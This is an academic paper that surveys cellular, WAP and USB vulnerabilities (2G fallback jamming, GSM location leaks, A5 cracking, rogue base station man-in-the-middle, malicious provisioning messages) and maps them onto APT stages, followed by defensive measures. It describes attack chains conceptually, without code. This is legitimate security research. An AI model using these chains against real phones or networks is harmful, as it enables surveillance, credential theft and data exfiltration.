How Vulnerabilities in Wireless Networks Can Enable Advanced Persistent Threats

International Journal on Information Technology (IREIT), Vol. xx, How Vulnerabilities in Wireless Networks Can Enable Advanced Persistent Threats Roger Piqueras Jover 1, Paul Giura 1 Abstract With the tremendous popularity of mobile devices and their increasing adoption in the corporate environments, there is a larger opportunity for Advanced Persistent Threats (APTs) to exploit vulnerabilities in wireless and mobility networks. We review several vulnerabilities and successful attacks in this domain, and evaluate the possibility of these attacks to be used by APTs. Our analysis shows that known attacks in the mobility domain are powerful enough to contribute to the success of an APT operation. Copyright 2013 Praise Worthy Prize S.r.l. - All rights reserved. Keywords: Advanced Persistent Threat, Security, Wireless communications I. Introduction Advanced Persistent Threats (APTs) are some of the fastest growing information security threats that organizations face today [1]. They are operated by very skilled and well funded attackers targeting sensitive information from specific organizations. The ultimate goal is to steal intellectual property created from expensive research, to gain access to sensitive customer data or to access strategic business information that could be used for illegal insider trading or to disrupt an organization's business. APT can best be defined using the words deriving the acronym [2]. Advanced (A) means that attackers are well trained, organized, well funded and utilize a full spectrum of network intrusion technologies, crafting their own tools if needed. Persistent (P) refers to the persistence of the attack over long periods of time. Attackers give high priority to a specific task, rather than opportunistically seeking immediate gain, and maintain a prolonged presence in the compromised organization networks. Threat (T) refers to the attackers intention to inflict damage and create loss by disrupting services or stealing proprietary data. APTs have become very sophisticated and diverse in the methods and technologies used, particularly in the ability to use organizations' own employees to penetrate the IT systems [1]. They are characterized as low and slow advanced operations: low for maintaining a low profile in the networks and slow for long execution times. Analyses of specific APT instances conclude that each operation is unique and highly customized for each target ([1], [3]-[5]). However, across many operations, the stages are similar and they differentiate mostly in the specific methods used to achieve each milestone. Figure 1 shows these stages in the order in which they are typically executed over long periods of time, and what are the actions within each Manuscript received January 2013, revised February 2013 stage. Typical security analyses focus on scalable attacks that can target infrastructure, millions of users, etc. Many attacks to cellular networks (i.e. GSM) have not gathered much attention because of that aspect. However, with the advent of APT, scale is no longer the issue. The most precise and targeted attacks are the most effective. In this paper we evaluate the possibility of APT operators exploiting known attacks and vulnerabilities in the wireless and mobility domain to accomplish their missions. Our analysis provides a useful insight not only for detection of APT but also for the forensic investigations that follow up the discovery of an attack. To our knowledge, no other study leverages the possibility of attackers exploiting vulnerabilities of wireless networks to launch and maintain an APT. Fig. 1. Typical stages of an APT With this work we make the following key contributions: We provide a review of relevant recent known attacks in the wireless and mobility domain. Copyright 2013 Praise Worthy Prize S.r.l. - All rights reserved

We assess the possibility that the wireless and mobility attacks can be used to accomplish various actions of a potential APT. We recommend a set of preventative measures that should be considered in order for organizations to reduce the risk of being targets of successful APTs. The rest of the paper is organized as follows. Section II surveys some of the wireless networks vulnerabilities and known attacks exploiting them, Section III shows how vulnerabilities can be used by APTs, Section IV lists a set of practical measures that can limit the success of APTs, and, finally, in Section V, we present our conclusions. II. Vulnerabilities in wireless cellular networks This section presents an overview of the vulnerabilities and weak points that attackers could exploit in order to prepare, launch and maintain an APT. For example, both data and voice communications could potentially be eavesdropped during the Reconnaissance stage to profile employees. The information obtained in this stage could be used to optimize the crafting of malware and spear-phishing techniques in the Delivery stage. With the deployment of a rogue Base Station (BS), the actual Delivery and Exploitation stages could be implemented. Finally, a wireless terminal connected to the mobility network could potentially be used in the Exfiltration stage, avoiding the enterprise firewall. II.1. Default fall back to 2G networks Vulnerability: By design, all cellular networks based on 3GPP standards (i.e. GSM/GPRS/EDGE, UMTS and LTE) fall back to a basic 2G (Global System for Mobile Communications, GSM) connection when connectivity on 3G or beyond cannot be achieved. This can be as a result of traffic balancing or because reception on the desired radio band is not possible. In this way, a mobile device can always be online independently of the 3G footprint of a given provider. It is well known that 2G networks are insecure and provide weak encryption [6]. Given the lack of dual authentication of GSM [7], this fall back can potentially create a security breach. Multiple vulnerabilities that could be exploited in this situation are analyzed in the remainder of this section. In order to attempt different attacks, jamming tools are often applied to force phones to fall back to 2G. Jamming Attack: Radio jamming is the deliberate transmission of radio signals to disrupt communications by decreasing the signal to noise ratio. This attack has been studied in the literature in the context of cellular communications [8]. By means of a radio jammer, an attacker could make a cell-phone unable to detect any 3G base station, forcing it to fall back to GSM to access the network [9]. Despite its effectiveness, jamming can be potentially detected and it requires the attacker either to be in the close vicinity of the victim or to transmit a very large amount of power, which alerts of its presence. Smart Jamming Attack: This technique aims to locally disrupt the communications of a wireless network in an undercover way raising no alerts. This is done by means of saturating one or more of the essential control channels required by all mobile devices to access the spectrum. Multiple studies in the literature theoretically demonstrate how to saturate a cellular network by means of, for example, text messages (Short Message Service, SMS) [10] or sustained and periodic set-ups of data connections [11]. Smart jamming is a simple more localized attack that is aimed at low layers. It targets essential control channels shared by all the users within a cell that carry signaling information during the initial access to the system. Saturation of these channels would make the network appear unresponsive and could force a phone to switch to a GSM connection. In parallel, given that this attack requires low transmitted power and can be done at pre-authentication, detection and mitigation are difficult. This attack has been already demonstrated in the context of GSM networks ([12]. [13]) and is theoretically possible on 3G and LTE (Long Term Evolution). A recent report discusses about the feasibility of jamming Long Term Evolution (LTE) networks in a similar way [14]. II.2. GSM location leaks Vulnerability: The way cellular networks handle incoming calls leaks some information that can be used to locate a device. Upon an incoming connection, the core network attempts to find the mobile station within an area where it was known to have been recently, known as the Location Area Code (LAC) [15]. To do so, paging messages are sent over all the cells contained in the LAC. These paging messages as well as the responses sent on the Random Access Channel are not encrypted and can potentially be sniffed by an attacker. Target Localization Attack: The authors of [16] demonstrate a practical technique to locate a specific target given its phone number. By means of sniffing traffic and discarding locations where the target is not present, it is possible to locate a mobile user in terms of cell. This allows the attacker to locate its victim and proceed to jam that specific cell. Similar techniques are introduced in [17] to locate any device. II.3. GSM security Vulnerability: The second generation of wireless networks (2G or GSM) has been in wide use for a very long time. Its security attributes, considered strong at the time of deployment, have been proven to be vulnerable as technology evolved and allowed attackers to obtain the

necessary tools at low cost. Over the last few years, multiple attacks have exploited such weaknesses. The three main features of GSM security are: 1) authentication of the subscriber accessing the network, 2) encryption of user data at the radio interface and 3) use of temporary identities for confidentiality [7]. The first two features are based on an individual secret key (K i ) stored in the SIM card of a mobile terminal. Another copy of this key is stored at the network authentication center. The authentication of the subscriber is performed with a challenge message sent from the network. The phone responds with the result of applying a cryptographic function with the secret key and the challenge. In parallel, a temporary session key (K c ) is generated. This is the key used to encrypt the radio traffic. The subscriber identity (IMSI) is kept secret and it is only transmitted over the air on very special occasions; a temporary identity (TMSI) is used for most of the transactions. The asymmetry of the authentication protocol, that does not require the network to identify itself, makes a Man-inthe-Middle (MitM) attack possible. II.4. GSM encryption Vulnerability: The A4 is the GSM encryption algorithm for the radio interface [7]. It is based on the session key K c described in Section II.C. This 64-bit key is combined with the frame number (22 bits) in order to generate a pseudo-random key stream (114 bits) that is combined (XOR) with the plain text message to generate the encrypted message. This algorithm has been expanded with multiple variations A5/1, A5/2, A5/3 and A5/0). During the connection and authentication step, the phone and the network agree which algorithm to use. Note that A5/0 stands for not applying any encryption at all so, by means of a rogue base station, an attacker could fool a victim to turn off encryption. GSM Sniffing/Hacking Attack: The A5 algorithm has been recently cracked. This allows an attacker to eavesdrop and decrypt all the traffic a victim generates as well as the traffic that is received. The authors of [6] present a way to break the encryption by means of rainbow tables and obtain the session key. After identifying a victim and its TMSI, the attacker sends a text message to the target device to force it to establish a connection. The attacker then eavesdrops the handshake between the device and the base station to transmit the message. This is a known handshake protocol, therefore both the plain text and the encrypted version of several control messages are known. A lookup on a rainbow table provides the session key that was used. Once the session key is obtained, all transactions can be decrypted in real time. Fig. 2. Man in the Middle attack and Connection Hijacking Man-in-the-Middle Attack: Many security features of GSM have been defeated over the last few years [18]. As illustrated in Figure 2, an attacker is able to deploy a rogue base station and get target users to attach to it. Given that the authentication algorithm is not symmetric, the network is not required to authenticate, so the device believes it is connected to a real Base Station. To achieve a full Man-in-the-Middle (MitM) position, the attacker attempts to access the network claiming the victim's identity. After receiving the challenge message from the network, the challenge message is forwarded to the victim. The victim's reply with the correct response is, in turn, forwarded to the network. This kind of attack has been discussed in the context of 3G networks as well [19]. Researchers have shown how, by means of a rogue base station, phishing attacks can be launched to a victim in order to obtain all kinds of credentials such as banking information, logins, passwords and other highly sensitive information [20]. In a similar way, malware can be forced into the device. II.5. WAP protocol and provisioning Vulnerability: The Wireless Application Protocol (WAP) defines industry-wide specifications for developing applications that operate over wireless communication networks [21]. It is responsible for initialization and alert messages and defines how PUSH and PULL applications interact with the network. One of the main functions of WAP is provisioning, which defines how a WAP client (cellphone) is configured for a specific application. In the case of PUSH applications, a special message is sent to the phone informing that there is content available. This message indicates to the phone the address from where to obtain the content. PUSH messages are also used to display alerts or messages on a phone. Both PUSH and provisioning messages are trusted and executed by the phone. Therefore, a malicious provisioning message could tamper with the phone's configuration. Crafting a PUSH message with the address hosting a piece of malware could force an infection into a phone. Malicious PUSH messages can also, for example, display messages on the screen fooling the user into typing a password. Connection Hijacking Attack: It has been demonstrated that provisioning messages can be maliciously crafted and sent to a victim from a rogue base

station. In this way, an attacker can change configuration settings of a phone. In particular, it is shown that the DNS configuration can be tampered to force connections through a malicious proxy that eavesdrops and captures all traffic [9]. This attack is also illustrated in Figure 2. Additionally, a spoofed PUSH message can potentially be used to trick a user to install malware on a phone [9]. Note that, in order to launch this attack, the victim has to be connected to a rogue GSM Base Station. for social engineering. Voicemail Hacking Attack: The recent News of the World scandal [24] brought mainstream attention to the feasibility of spoofing the caller ID and how this allows attackers to hack into voicemail accounts with no password or a default one. II.6. Mobility Vulnerability: A cell-phone is, by definition, a mobile terminal that is with the user most of the time. The mobility of such device enhances the threats on security networks it connects to. In the context of an APT, a cellphone might open the doors to attacks by circumventing security barriers such as firewalls (Figure 3). In current scenarios, an attacker trying to gain access to the inside of a corporate network crafts a phishing email very selectively targeted to someone within the organization. Other social engineered techniques are known to be used, such as physical access to the terminals and malware deployment by means of, for example, a USB drive. Mobile terminals present, though, a simpler alternative. Firewall Circumvention, Malware Deployment and Data Exfiltration Attacks: As described in Section II.E, a user can be fooled into downloading a piece of malicious code without installing any application. This malware can potentially be transferred to any computer to which the phone is physically connected, for example, to charge the battery. There are known attacks that aim to exhaust the victim's phone battery [22]. In this way an attacker can force a victim to plug the phone to a computer to charge it. In parallel, a mobile device often creates a bridge between a secured network environment, i.e. between the firewalls and the outside world (Figure 3). This happens in the case of a mobile phone connected to the Internet via a 3G connection that is, in parallel, connected to a host within a corporation network. Also, a phone is sometimes in a secure (corporate) network and later in a less secure one (home network). Beyond deploying malware, an infected phone can also potentially be used to exfiltrate data. The actual contents of the phone or files from the host computer could be delivered to a server under the attacker's control over WiFi or 3G using the phone as a bridge to circumvent firewalls. II.7. Voicemail Vulnerability: Secured access to voicemail accounts is primarily based on a password being used for authentication. However, many cellular providers have the password for the voicemail as an optional feature that the user can deactivate, and sometimes the default password is not changed [23]. This could potentially provide an attacker with access to employee information Fig. 3. Mobility + USB circumventing corporate firewalls II.8. USB interface Vulnerability: USB has become the universal standard for both data transferring and battery charging in smart phones. In both processes, the phone is physically connected to a computer. The communication protocol over USB is inherently trusted and assumed to be secure. This is mainly due to the physical proximity between the two devices and the fact that it is the user who connects them. The USB protocol is equipped with no mechanisms to authenticate the validity of the device attempting to communicate with the host. This potentially allows an attacker to disguise and report itself as a different device, such as a USB keyboard, mouse, etc. This trust is known to be often abused in the context of USB pen drives or memory sticks [25]. Known instances of malware can exploit certain vulnerabilities of the USB boot process to deploy a malicious payload on the host. Malware Transmission Via USB Attack: In [26] authors demonstrate how these vulnerabilities can be exploited in the context of smart-phones. They show that a smart-phone connected to a host can claim to be a USB keyboard and send keystrokes. The attacker gains full access to the host under the privileges of the current user. This can potentially be used to install malware or exfiltrate data. Once mounted, the device has full control to drop any specially crafted media file to exploit the corresponding processing engine. The same authors describe a symmetric attack vector that allows an attacker to deploy a malicious payload into a mobile device from the computer it is connected to. This exploit, combined with the mobility of a cell-phone, allows an attacker to infect a user in a less secure location (home) and the payload to be deployed into the corporate network,

Fig. 4. Leveraging wireless network vulnerabilities to initiate maintain and complete an APT circumventing firewalls (Figure 3). III. APT in Mobility Domain An APT has a specific target, which could be either a person, proprietary data or organization assets. Each one of the security incidents and exploitations can occur in a combination of different contexts. It is precisely this combination of environments that makes this attack very difficult to detect. Entry vectors are often assumed to use wired networks. In this section we show how the attacks described in Section II can be used throughout an APT operation. We assume that the core of the attack, i.e. Operation and Data Collection stages, must be completed by an attacker from within the corporate network. These stages cannot take advantage of any vulnerability in wireless networks. However, we show that the attacks described in Section II can be leveraged to achieve the remainder steps of the APT. Based on the model in Figure 1, the intrusion is divided in 4 stages on the left column of Figure 4. The second column lists multiple actions and milestones that are defined for each stage. The attacks analyzed in Section II are placed on the remainder columns. The body of Figure 4 indicates what milestones can be reached using each attack. Finally, the arrows indicate one example strategy to launch, maintain and complete an APT operation. Each step is indicated with a shaded rectangle and label numbers represent the order of the steps, multiple steps being possible for most actions. III.1. Reconnaissance In the initial Reconnaissance stage, an attacker could identify and locate a victim by means of sniffing paging messages and exploiting location leaks (Step 1 in Figure 4). Assuming that a phone has been forced to fall back to GSM (i.e. jamming, Step 2), an intruder can launch a Man in the Middle attack. This gives the attacker the ability to extract information for profiling and scan potential vulnerabilities of the victim's device (Steps 3 and 4). The encryption of GSM can be broken to listen to calls and read messages, providing further information for the employee's profiling. A malicious PUSH or provisioning WAP message can be used to tamper the DNS configuration of a phone. From that point, all traffic can be re-routed through a malicious proxy controlled by the attacker and information can be extracted [9]. Further social engineering data can be obtained by hacking into the voice-mail [23]. These methods potentially allow an attacker to obtain all kinds of information from a set of victims and elaborate a complete profile about them. Once a piece of malware or a rootkit is deployed on the phone, the victim profiles can be completed with extra data such as location information. The malware can potentially turn on the field test mode in the phone to track the location of the set of victims. III.2. Delivery/Exploitation Given their mobility, cell-phones are a potential platform for malware infection of terminals within the boundaries of the corporate firewalls. Section II.F and II.H describe how vulnerabilities in the USB protocol can be exploited to transfer a malicious payload from an infected computer at an insecure location to a mobile phone. The infection is then transferred to a corporate machine. Note that, known attacks that aim to exhaust the battery of a phone [22] can be added to the equation to force the actual physical USB connection to recharge the phone. A malicious payload can be forced into the victim's phone by means of a spear-phishing PUSH message or from a rogue base station (Steps 5 and 6 of Figure 4).

Then, exploiting USB vulnerabilities and the inherent mobility of the phone, the malware is transferred into the employee's corporate machine, allowing the attacker to control it (Steps 7 and 8). Finally, diverse access information is obtained by launching multiple attacks (Step 9). The victim is fooled into entering credentials such usernames, token codes, passwords, etc [20]. In parallel, the GSM encryption can be broken so communications can be eavesdropped on the fly or stored for later analysis [6]. The malicious payload in the victim's phone can also be used to exfiltrate information such as contacts, recent called numbers and other data stored in the device. With the stolen credentials, an attacker can gain access to an insider's account. From that initial victim, a further phishing email can be sent to a second victim. This technique could be applied to elevate privileges and move closer to the target. III.3. Exfiltration Finally, because of their inherent mobility, cell-phones can potentially be used as a platform for a sequential exfiltration of targeted data (Steps 11 and 12 in Figure 4). Instead of tunneling the stolen data through firewalls and protected perimeters to some external server, data could be gathered in small pieces by one or multiple phones. These, in turn, forward the chunks of data to an external server either over the 3G connection or over WiFi. To ensure the exfiltration process goes undetected, the phone only uses the employee's home connection. In this way, the actual exfiltration process originates in a less secure location. IV. Preventative Measures Even though some attacks described in Section II are difficult to detect, certain preventative measures can be taken to minimize the probability of exploitation. We propose a few items that organizations should consider that have the potential to raise the bar for APTs and can help forensic investigations. Personal/work device policy: It is difficult to enforce a policy to avoid the use of personal devices. A simpler policy, though, can be enforced for cell-phone usage in work environments. For example, work devices can only be synched at workstations and, while at home, they can only be charged by plugging into the outlet. Conversely, personal phones can only be synched at home and, while at work, they can only be charged by plugging into the outlet. In this way, firewall circumvention via mobile devices would not be possible. Enable 2G ON/OFF switch: As long as GSM networks remain active, the threats described in Section \ref{sec:attacks} will be present. However, the possibility of turning off 2G on a phone would be very beneficial to overcome 2G limitations. Forcing all the traffic of an employee's work phone to be transmitted on 3G would make it impossible for an attacker to launch certain attacks. While most phones allow a user to disable 3G, such functionality is not typically available for disabling 2G. We have developed a prototype app to allow a user to manually disable GSM 2G. Enforce voicemail password: The enforcement of a password for employee's voice mail is a simple and effective measure that can help prevent voicemail hacking. Enable wireless data monitoring: Monitoring closely data traffic generated over cellular networks has the potential to reveal some of the malicious activities that a device might be involved in, such as malware download, data exfiltration or leaking of location information. Mobility data should be added to the set of environments monitored by corporations for security and forensic investigation purposes. The APT detection mechanisms should look for signs of attacks by considering broader contexts around possible targets, such as proprietary data servers, high profile employees, critical assets, etc. TABLE I ATTACKS MITIGATION MEASURES Attacks Policy 2G OFF VM-Pwd Monitor Jamming (II-A) X Location (II-B) MitM (II-C) X X GSM Sniff (II-D) X X Hijacking (II-E) X X Mobility (II-F) X X Voicemail (II-G) X X USB (II-H) X X Table I indicates the attacks from Section II that can be avoided or mitigated by means of each preventative measure. Note that paging messages can potentially be sniffed, therefore allowing mobile phones to be located. V. Conclusions This research has reviewed several wireless networks and mobility vulnerabilities and has evaluated the possibility of known attacks to be exploited by an APT operation. Our study shows that the attacks surveyed have the potential to initiate and maintain an APT operation by providing several information-gathering opportunities in the Reconnaissance stage, malware deployment in the Delivery/Exploitation stage, and silent export of data from within the enterprise's network in the Exfiltration stage. Additionally, we propose a set of preventative measures that enterprises can use in order to detect and address some of the vulnerabilities and attacks presented. In future work we seek to identify quantitative methods to assess the potential APT risk that the increasing use of mobile devices can bring to enterprise environments.

References [1] RSA. RSA Security Brief: Mobilizing Intelligent Security Operations for Advanced Persistent Threats, http://tinyurl.com/6n6rqfp, February 2011. [2] P. Giura and W. Wang, Using Large Scale Distributed Computing to Unveil Advanced Persistent Threats, Academy of Science and Engineering Science Journal, vol.1, no. 3, December 2012, pp. 93-105. [3] B. Krekel, G. Bakos, and C. Barnett, Capability of the People s Republic of China to conduct cyber warfare and computer network exploitation, The US-China Economic and Security Review Commision, Washington, DC, Research Report, 2009. [4] Damballa, The Command Structure of the Aurora Botnet, http://www.damballa.com/research/aurora/, March 2010. [5] SANS Technology Institute, Assessing Outbound Traffic to Uncover Advanced Persistent Threat, http://tinyurl.com/65sg29s, May 2011. [6] K. Nohl and S. Munaut, Wideband GSM sniffing, In 27 th Chaos Communication Congress, 2010, http://tinyurl.com/33ucl2g [7] G. Horn, D. Forsberg, W. Moeller, and V. Niemi, LTE Security (John Wiley & Sons, 2010). [8] W. Xu, Y. Zhang, and T. Wood, The feasibility of launching and detecting jamming attacks in wireless networks, In ACM MOBIHOC, 2005, pp. 46-57. [9] C. Mune, R. Gassira, and R. Piccirillo, Highjacking mobile data connections, In BlackHat Europe, 2009, http://tinyurl.com/7b2gvdg. [10] P. Traynor, W. Enck, P. Mcdaniel, and T. La Porta, Exploiting open functionality in SMS-capable cellular networks, In J. Comput Secur., vol. 16. Amsterdam, The Netherlands, IOS Press, December 2008, pp. 713 742. [11] P. Lee, T. Bu, and T. Woo, On the detection of signaling dos attacks on 3G wireless networks, In INFOCOM 2007: 26 th IEEE International Conference on Computer Communications. IEEE, May 2007, pp. 1289-1297. [12] Grugq, Base jumping: Attacking the GSM baseband and Base Station, In BlackHat Abu Dhabi, 2011, http://tinyurl.com/7laga5r. [13] D. Spaar, A practical DoS attack to the GSM network, In DeepSec 2009, http://tinyurl.com/7vtdoj5. [14] Talbot, David, One Simple Trick Could Disable a City s 4G Phone Network, MIT Technology Review, November 2012, http://www.technologyreview.com/news/507381/one-simpletrick-could-disable-a-citys-4g-phone-network/ [15] 3rd Generation Partnership Project, Mobile radio interface layer 3 specification, 3GPP TS 04.08, vol. v7.21.0, 2004. [16] D. Kune, J. Koelndorfer, and N. Hopper, Localization leaks on the GSM air interface, In 18th Annual Network and Distributed System Security Symposium, ser. NDSS 12, 2012. [17] D. Bailey and N. DePetrillo, The Carmen Sandiego Project, In BlackHat USA, 2010, http://tinyurl.com/85mtblw. [18] E. Gadaix, GSM and 3G security, In BlackHat Asia, 2001, http://tinyurl.com/85plhlv. [19] U. Meyer and S. Wetzel, A man-in-the-middle attack on UMTS, In Proceedings of the 3rd ACM workshop on Wireless security, ser. WiSe 04. New York, NY, USA: ACM, 2004, pp. 90 97. [20] D. Perez and J. Pico, A practical attack against GPRS/EDGE/UMTS/HSPA mobile data communications, In BlackHat DC, 2011, http://tinyurl.com/7wuf3er. [21] Open Mobile Aliance, WAP Architecture, http://www.openmobilealliance.org. [22] R. Racic, D. Ma, and H. Chen, Exploiting MMS vulnerabilities to stealthily exhaust mobile phone s battery, In Proceedings of the Second IEEE Communications Society / CreateNet International Conference on Security and Privacy in Communication Networks, 2006. [23] Boston-WCBTV, Websites show how to spoof caller id. voice mail hacking: Easier than you think?, July 2011, http://www.thebostonchannel.com/r/28674908/detail.html. [24] N. Davies and A. Hill, Missing Milly Dowler s voicemail was hacked by News of the World, In The Guardian UK, July 2011, http://tinyurl.com/6c6jgmw. [25] D. V. Pham, A. Syed, and M. N. Halgamuge, Universal serial bus based software attacks and protection solutions, Digital Investigation, vol. 7, no. 3-4, pp. 172 184, 2011. [26] Z. Wang and A. Stavrou, Exploiting smart-phone USB connectivity for fun and profit, In Proceedings of the 26th Annual Computer Security Applications Conference, ser. ACSAC 10. New York, NY, USA: ACM, 2010, pp. 357 366. Authors information 1 AT&T Security Research Center. New York, NY, 10007. Roger Piqueras Jover graduated from the Escola Tècnica Superior d'enginyeria de Telecomunicacions de Barcelona (ETSETB) in 2006 with the degree of Telecommunications Engineer. That same year he was awarded a Balsells Fellowship to pursue graduate studies in Electrical Engineering at the University of California in Irvine, where he graduated in 2008 with an MSc in Electrical and Computer Engineering. In 2010 he graduated with an MPhil/MSc in Electrical Engineering from Columbia University. He is a Member of Technical Staff at the AT&T Security Research Center. His research interests are in the area of mobile and wireless communications, radio resource allocation, new network architectures and security for wireless networks. Mr. Piqueras Jover is a professional member of the IEEE, Communications Society, the Association of Computing Machinery and SigComm. Paul Giura received his Ph.D. and Masters in Computer Science from the Department of Computer Science and Engineering at Polytechnic Institute of New York University in 2010 and 2007 respectively, and Bachelors in Computer Science from University of Bucharest, Romania in 2004. He is a Senior Member of Technical Staff at AT&T Security Research Center in New York City. His research interest is in the areas of network and device security, advanced persistent threat detection and mitigation, forensics, big data for security, systems and databases. Dr. Giura is a professional member of IEEE, Computer Society, an active contributor to Cloud Security Alliance mission, and serves in several technical program committees and editorial boards for leading security conferences and journals.